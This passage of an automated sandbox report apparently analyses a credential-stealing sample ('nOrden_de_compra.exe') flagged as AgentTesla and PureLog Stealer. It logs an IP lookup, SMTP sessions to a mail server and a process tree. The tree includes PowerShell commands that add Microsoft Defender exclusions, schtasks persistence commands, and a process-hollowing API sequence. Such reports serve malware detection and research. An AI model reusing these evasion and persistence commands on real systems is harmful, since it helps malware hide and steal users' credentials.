                                        Feb 2, 2024 14:04:02.469059944 CET1.1.1.1192.168.2.60x96c0No error (0)mail.triorentacar.rotriorentacar.roCNAME (Canonical name)IN (0x0001)false
                                        Feb 2, 2024 14:04:02.469059944 CET1.1.1.1192.168.2.60x96c0No error (0)triorentacar.ro89.32.46.159A (IP address)IN (0x0001)false
                                        • api.ipify.org
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.649702173.231.16.764431460C:\Users\user\Desktop\nOrden_de_compra.exe
                                        TimestampBytes transferredDirectionData
                                        2024-02-02 13:04:01 UTC155OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                        Host: api.ipify.org
                                        Connection: Keep-Alive
                                        2024-02-02 13:04:01 UTC157INHTTP/1.1 200 OK
                                        Server: nginx/1.25.1
                                        Date: Fri, 02 Feb 2024 13:04:01 GMT
                                        Content-Type: text/plain
                                        Content-Length: 12
                                        Connection: close
                                        Vary: Origin
                                        2024-02-02 13:04:01 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34
                                        Data Ascii: 81.181.57.74


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.649706173.231.16.764431176C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                                        TimestampBytes transferredDirectionData
                                        2024-02-02 13:04:03 UTC155OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                        Host: api.ipify.org
                                        Connection: Keep-Alive
                                        2024-02-02 13:04:04 UTC157INHTTP/1.1 200 OK
                                        Server: nginx/1.25.1
                                        Date: Fri, 02 Feb 2024 13:04:04 GMT
                                        Content-Type: text/plain
                                        Content-Length: 12
                                        Connection: close
                                        Vary: Origin
                                        2024-02-02 13:04:04 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34
                                        Data Ascii: 81.181.57.74


                                        TimestampSource PortDest PortSource IPDest IPCommands
                                        Feb 2, 2024 14:04:02.956008911 CET5874970389.32.46.159192.168.2.6220-triorentacar.triorentacar.ro ESMTP Exim 4.96.2 #2 Fri, 02 Feb 2024 15:04:01 +0200
                                        220-We do not authorize the use of this system to transport unsolicited,
                                        220 and/or bulk e-mail.
                                        Feb 2, 2024 14:04:02.956404924 CET49703587192.168.2.689.32.46.159EHLO 210979
                                        Feb 2, 2024 14:04:03.190959930 CET5874970389.32.46.159192.168.2.6250-triorentacar.triorentacar.ro Hello 210979 [81.181.57.74]
                                        250-SIZE 52428800
                                        250-8BITMIME
                                        250-PIPELINING
                                        250-PIPECONNECT
                                        250-STARTTLS
                                        250 HELP
                                        Feb 2, 2024 14:04:03.193321943 CET49703587192.168.2.689.32.46.159STARTTLS
                                        Feb 2, 2024 14:04:03.429385900 CET5874970389.32.46.159192.168.2.6220 TLS go ahead
                                        Feb 2, 2024 14:04:05.166806936 CET5874970789.32.46.159192.168.2.6220-triorentacar.triorentacar.ro ESMTP Exim 4.96.2 #2 Fri, 02 Feb 2024 15:04:04 +0200
                                        220-We do not authorize the use of this system to transport unsolicited,
                                        220 and/or bulk e-mail.
                                        Feb 2, 2024 14:04:05.167021036 CET49707587192.168.2.689.32.46.159EHLO 210979
                                        Feb 2, 2024 14:04:05.397469997 CET5874970789.32.46.159192.168.2.6250-triorentacar.triorentacar.ro Hello 210979 [81.181.57.74]
                                        250-SIZE 52428800
                                        250-8BITMIME
                                        250-PIPELINING
                                        250-PIPECONNECT
                                        250-STARTTLS
                                        250 HELP
                                        Feb 2, 2024 14:04:05.397617102 CET49707587192.168.2.689.32.46.159STARTTLS
                                        Feb 2, 2024 14:04:05.630676985 CET5874970789.32.46.159192.168.2.6220 TLS go ahead
                                        Feb 2, 2024 14:04:06.695008039 CET5874970889.32.46.159192.168.2.6220-triorentacar.triorentacar.ro ESMTP Exim 4.96.2 #2 Fri, 02 Feb 2024 15:04:05 +0200
                                        220-We do not authorize the use of this system to transport unsolicited,
                                        220 and/or bulk e-mail.
                                        Feb 2, 2024 14:04:06.695219040 CET49708587192.168.2.689.32.46.159EHLO 210979
                                        Feb 2, 2024 14:04:06.929497004 CET5874970889.32.46.159192.168.2.6250-triorentacar.triorentacar.ro Hello 210979 [81.181.57.74]
                                        250-SIZE 52428800
                                        250-8BITMIME
                                        250-PIPELINING
                                        250-PIPECONNECT
                                        250-STARTTLS
                                        250 HELP
                                        Feb 2, 2024 14:04:06.929670095 CET49708587192.168.2.689.32.46.159STARTTLS
                                        Feb 2, 2024 14:04:07.165019989 CET5874970889.32.46.159192.168.2.6220 TLS go ahead
                                        Feb 2, 2024 14:04:08.511997938 CET5874970989.32.46.159192.168.2.6220-triorentacar.triorentacar.ro ESMTP Exim 4.96.2 #2 Fri, 02 Feb 2024 15:04:07 +0200
                                        220-We do not authorize the use of this system to transport unsolicited,
                                        220 and/or bulk e-mail.
                                        Feb 2, 2024 14:04:08.512509108 CET49709587192.168.2.689.32.46.159EHLO 210979
                                        Feb 2, 2024 14:04:08.745165110 CET5874970989.32.46.159192.168.2.6250-triorentacar.triorentacar.ro Hello 210979 [81.181.57.74]
                                        250-SIZE 52428800
                                        250-8BITMIME
                                        250-PIPELINING
                                        250-PIPECONNECT
                                        250-STARTTLS
                                        250 HELP
                                        Feb 2, 2024 14:04:08.745388031 CET49709587192.168.2.689.32.46.159STARTTLS
                                        Feb 2, 2024 14:04:08.979149103 CET5874970989.32.46.159192.168.2.6220 TLS go ahead

                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:14:03:56
                                        Start date:02/02/2024
                                        Path:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        Imagebase:0x8d0000
                                        File size:730'624 bytes
                                        MD5 hash:593BB72286C1C2CE5C2456C7D9585A80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2116574097.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2116474951.0000000007160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2114084999.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2113140924.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:3
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe
                                        Imagebase:0xc00000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                                        Imagebase:0xc00000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp
                                        Imagebase:0x80000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        Imagebase:0x380000
                                        File size:730'624 bytes
                                        MD5 hash:593BB72286C1C2CE5C2456C7D9585A80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:10
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        Imagebase:0xb00000
                                        File size:730'624 bytes
                                        MD5 hash:593BB72286C1C2CE5C2456C7D9585A80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.4531607343.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.4531607343.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false

                                        Target ID:11
                                        Start time:14:03:59
                                        Start date:02/02/2024
                                        Path:C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                                        Imagebase:0x380000
                                        File size:730'624 bytes
                                        MD5 hash:593BB72286C1C2CE5C2456C7D9585A80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2146832318.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 63%, ReversingLabs
                                        • Detection: 43%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:true

                                        Target ID:12
                                        Start time:14:04:00
                                        Start date:02/02/2024
                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                        Imagebase:0x7ff717f30000
                                        File size:496'640 bytes
                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:13
                                        Start time:14:04:01
                                        Start date:02/02/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmp
                                        Imagebase:0x80000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:14
                                        Start time:14:04:01
                                        Start date:02/02/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:15
                                        Start time:14:04:02
                                        Start date:02/02/2024
                                        Path:C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                                        Imagebase:0x510000
                                        File size:730'624 bytes
                                        MD5 hash:593BB72286C1C2CE5C2456C7D9585A80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4531554199.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4531554199.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:12.6%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:162
                                          Total number of Limit Nodes:5
                                          execution_graph 24963 71e5e1a 24964 71e5e20 24963->24964 24968 71e8918 24964->24968 24985 71e8908 24964->24985 24965 71e5de0 24969 71e8932 24968->24969 24970 71e8956 24969->24970 25002 71e8eff 24969->25002 25007 71e8f89 24969->25007 25011 71e8e6b 24969->25011 25016 71e940a 24969->25016 25021 71e8def 24969->25021 25027 71e9213 24969->25027 25031 71e8f53 24969->25031 25035 71e9092 24969->25035 25040 71e8d32 24969->25040 25045 71e8fd7 24969->25045 25050 71e8d99 24969->25050 25055 71e935d 24969->25055 25059 71e90fc 24969->25059 25063 71e91bf 24969->25063 24970->24965 24986 71e8932 24985->24986 24987 71e8956 24986->24987 24988 71e8eff 2 API calls 24986->24988 24989 71e91bf 2 API calls 24986->24989 24990 71e90fc 2 API calls 24986->24990 24991 71e935d 2 API calls 24986->24991 24992 71e8d99 2 API calls 24986->24992 24993 71e8fd7 2 API calls 24986->24993 24994 71e8d32 2 API calls 24986->24994 24995 71e9092 2 API calls 24986->24995 24996 71e8f53 2 API calls 24986->24996 24997 71e9213 2 API calls 24986->24997 24998 71e8def 2 API calls 24986->24998 24999 71e940a 2 API calls 24986->24999 25000 71e8e6b 2 API calls 24986->25000 25001 71e8f89 2 API calls 24986->25001 24987->24965 24988->24987 24989->24987 24990->24987 24991->24987 24992->24987 24993->24987 24994->24987 24995->24987 24996->24987 24997->24987 24998->24987 24999->24987 25000->24987 25001->24987 25003 71e8f1f 25002->25003 25068 71e4f38 25003->25068 25072 71e4f30 25003->25072 25004 71e8f34 25004->24970 25076 71e56a8 25007->25076 25080 71e56a0 25007->25080 25008 71e8fae 25012 71e8e6c 25011->25012 25013 71e900f 25012->25013 25084 71e55b8 25012->25084 25088 71e55b3 25012->25088 25013->24970 25017 71e8e90 25016->25017 25017->25016 25018 71e972b 25017->25018 25019 71e55b8 WriteProcessMemory 25017->25019 25020 71e55b3 WriteProcessMemory 25017->25020 25019->25017 25020->25017 25022 71e8d36 25021->25022 25023 71e8d98 25022->25023 25092 71e5834 25022->25092 25096 71e5840 25022->25096 25023->24970 25100 71e4fe8 25027->25100 25104 71e4fe0 25027->25104 25028 71e91be 25028->24970 25108 71e54f8 25031->25108 25112 71e54f0 25031->25112 25032 71e8f74 25032->24970 25036 71e8f1f 25035->25036 25037 71e8f34 25035->25037 25038 71e4f38 ResumeThread 25036->25038 25039 71e4f30 ResumeThread 25036->25039 25037->24970 25038->25037 25039->25037 25041 71e8d5c 25040->25041 25043 71e5834 CreateProcessA 25041->25043 25044 71e5840 CreateProcessA 25041->25044 25042 71e8e39 25042->24970 25043->25042 25044->25042 25046 71e8fdd 25045->25046 25048 71e55b8 WriteProcessMemory 25046->25048 25049 71e55b3 WriteProcessMemory 25046->25049 25047 71e900f 25048->25047 25049->25047 25051 71e8d36 25050->25051 25053 71e5834 CreateProcessA 25051->25053 25054 71e5840 CreateProcessA 25051->25054 25052 71e8e39 25052->24970 25053->25052 25054->25052 25057 71e4fe8 Wow64SetThreadContext 25055->25057 25058 71e4fe0 Wow64SetThreadContext 25055->25058 25056 71e8eee 25057->25056 25058->25056 25061 71e55b8 WriteProcessMemory 25059->25061 25062 71e55b3 WriteProcessMemory 25059->25062 25060 71e912f 25061->25060 25062->25060 25064 71e8e61 25063->25064 25065 71e900f 25064->25065 25066 71e55b8 WriteProcessMemory 25064->25066 25067 71e55b3 WriteProcessMemory 25064->25067 25065->24970 25066->25065 25067->25065 25069 71e4f78 ResumeThread 25068->25069 25071 71e4fa9 25069->25071 25071->25004 25073 71e4f78 ResumeThread 25072->25073 25075 71e4fa9 25073->25075 25075->25004 25077 71e56f3 ReadProcessMemory 25076->25077 25079 71e5737 25077->25079 25079->25008 25081 71e56a8 ReadProcessMemory 25080->25081 25083 71e5737 25081->25083 25083->25008 25085 71e5600 WriteProcessMemory 25084->25085 25087 71e5657 25085->25087 25087->25013 25089 71e55b8 WriteProcessMemory 25088->25089 25091 71e5657 25089->25091 25091->25013 25093 71e5840 CreateProcessA 25092->25093 25095 71e5a8b 25093->25095 25095->25095 25097 71e58c9 CreateProcessA 25096->25097 25099 71e5a8b 25097->25099 25101 71e502d Wow64SetThreadContext 25100->25101 25103 71e5075 25101->25103 25103->25028 25105 71e4fe8 Wow64SetThreadContext 25104->25105 25107 71e5075 25105->25107 25107->25028 25109 71e5538 VirtualAllocEx 25108->25109 25111 71e5575 25109->25111 25111->25032 25113 71e54f8 VirtualAllocEx 25112->25113 25115 71e5575 25113->25115 25115->25032 25137 50e4668 25138 50e467a 25137->25138 25139 50e4686 25138->25139 25141 50e4778 25138->25141 25142 50e479d 25141->25142 25146 50e4888 25142->25146 25150 50e4879 25142->25150 25148 50e48af 25146->25148 25147 50e498c 25147->25147 25148->25147 25154 50e44b4 25148->25154 25151 50e4888 25150->25151 25152 50e44b4 CreateActCtxA 25151->25152 25153 50e498c 25151->25153 25152->25153 25155 50e5918 CreateActCtxA 25154->25155 25157 50e59db 25155->25157 25116 50ed000 25117 50ed046 25116->25117 25121 50ed5e8 25117->25121 25124 50ed5d8 25117->25124 25118 50ed133 25122 50ed616 25121->25122 25127 50ed23c 25121->25127 25122->25118 25125 50ed23c DuplicateHandle 25124->25125 25126 50ed616 25125->25126 25126->25118 25128 50ed650 DuplicateHandle 25127->25128 25129 50ed6e6 25128->25129 25129->25122 25130 71e9b40 25131 71e9ccb 25130->25131 25133 71e9b66 25130->25133 25133->25131 25134 71e6cb0 25133->25134 25135 71e9dc0 PostMessageW 25134->25135 25136 71e9e2c 25135->25136 25136->25133 25158 50eac70 25161 50ead68 25158->25161 25159 50eac7f 25162 50ead79 25161->25162 25163 50ead9c 25161->25163 25162->25163 25169 50eaff1 25162->25169 25173 50eb000 25162->25173 25163->25159 25164 50ead94 25164->25163 25165 50eafa0 GetModuleHandleW 25164->25165 25166 50eafcd 25165->25166 25166->25159 25171 50eb014 25169->25171 25170 50eb039 25170->25164 25171->25170 25177 50ea0f0 25171->25177 25174 50eb014 25173->25174 25175 50eb039 25174->25175 25176 50ea0f0 LoadLibraryExW 25174->25176 25175->25164 25176->25175 25178 50eb1e0 LoadLibraryExW 25177->25178 25180 50eb259 25178->25180 25180->25170

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 7222106-722210a 1 722210b-7222120 0->1 2 7222acd-7222adf 0->2 1->2 3 7222121-722212c 1->3 5 7222132-722213e 3->5 6 722214a-7222159 5->6 8 72221b8-72221bc 6->8 9 72221c2-72221cb 8->9 10 7222264-72222ce 8->10 11 72221d1-72221e7 9->11 12 72220c6-72220d2 9->12 10->2 48 72222d4-722281b 10->48 19 7222239-722224b 11->19 20 72221e9-72221ec 11->20 12->2 13 72220d8-72220e4 12->13 15 72220e6-72220fa 13->15 16 722215b-7222161 13->16 15->16 26 72220fc-7222105 15->26 16->2 21 7222167-722217f 16->21 30 7222251-7222261 19->30 31 7222a0c-7222ac2 19->31 20->2 23 72221f2-722222f 20->23 21->2 29 7222185-72221ad 21->29 23->10 44 7222231-7222237 23->44 26->0 29->8 31->2 44->19 44->20 126 7222832-72228c5 48->126 127 722281d-7222827 48->127 128 72228d0-7222963 126->128 127->128 129 722282d 127->129 131 722296e-7222a01 128->131 129->131 131->31
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: D
                                          • API String ID: 0-2746444292
                                          • Opcode ID: 9622f863a9d3be29d5ebf44554bdef82f4c880654e8cf57d954dfa5ff2dad5b9
                                          • Instruction ID: 457c1f925362853d724320bdb555b517f2cb6a3e0c4ca94d97eb9e51c29d5deb
                                          • Opcode Fuzzy Hash: 9622f863a9d3be29d5ebf44554bdef82f4c880654e8cf57d954dfa5ff2dad5b9
                                          • Instruction Fuzzy Hash: B152A878A102199FDB54DF64C898B9DBBB6BF89300F1085D9E909A7361CF31AE81CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 66d1b314d09422db2c6adbcb73451de2e35b610557c905050e7cfc7bb46e7a6d
                                          • Instruction ID: 80671c2b1aeca6b26ee7b242c9f04059a79eb731f66683b0fa1896247976368c
                                          • Opcode Fuzzy Hash: 66d1b314d09422db2c6adbcb73451de2e35b610557c905050e7cfc7bb46e7a6d
                                          • Instruction Fuzzy Hash: C6B2F174E10628DFDB64DF69C980AD9BBB2FF89304F1581E9D509AB221DB319E81CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 30477a938833b15116e2cefe2f27175b6692ccf61e25cc4a97fb2615959a81b8
                                          • Instruction ID: 5299f840f361404ab0c547341cf5db49d3716f8ecbab5cce3ed3423298a57644
                                          • Opcode Fuzzy Hash: 30477a938833b15116e2cefe2f27175b6692ccf61e25cc4a97fb2615959a81b8
                                          • Instruction Fuzzy Hash: F032CDB0B01A048FDB19DB79D554BAEBBFAAF89700F248469E5469B3D1CB30ED01CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 928ca492727187404661820668c4b5f96b0ef8100c8a95353591f3663200dbed
                                          • Instruction ID: 8f92c7b3818fb0e959787a26678b3653f212ea95bcfa8a6f9d941d34fb7293c5
                                          • Opcode Fuzzy Hash: 928ca492727187404661820668c4b5f96b0ef8100c8a95353591f3663200dbed
                                          • Instruction Fuzzy Hash: DDC186B5E016588FDB58DF6AC944ADDBBF2BF89300F14C1A9D909AB324DB305E858F50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 644bf80f7a359c6da5c7d25f0e984e4015a54377eeac1a0088ad0655280865b6
                                          • Instruction ID: fcd7479bdb44e71a3d8e8dea1adc27f3da972c0882b7e04df47c50c282754927
                                          • Opcode Fuzzy Hash: 644bf80f7a359c6da5c7d25f0e984e4015a54377eeac1a0088ad0655280865b6
                                          • Instruction Fuzzy Hash: 7461F8B8E112198FDB54DFA9D8947ADBBB2FB89300F208129D909BB398DB345D45CF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1ec35f80a7ae3d7d9327a092a8127bae54942a32caa5c1734dc67412f3f73755
                                          • Instruction ID: aaed141c7d92c0ca7f85cbc1a78a865de88ea428c98e70270ca7c193fb40cfdc
                                          • Opcode Fuzzy Hash: 1ec35f80a7ae3d7d9327a092a8127bae54942a32caa5c1734dc67412f3f73755
                                          • Instruction Fuzzy Hash: C461FCB5E1021D9FDB04DFE9D4846EEBBB2FF89300F108029E915AB258DB345946DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
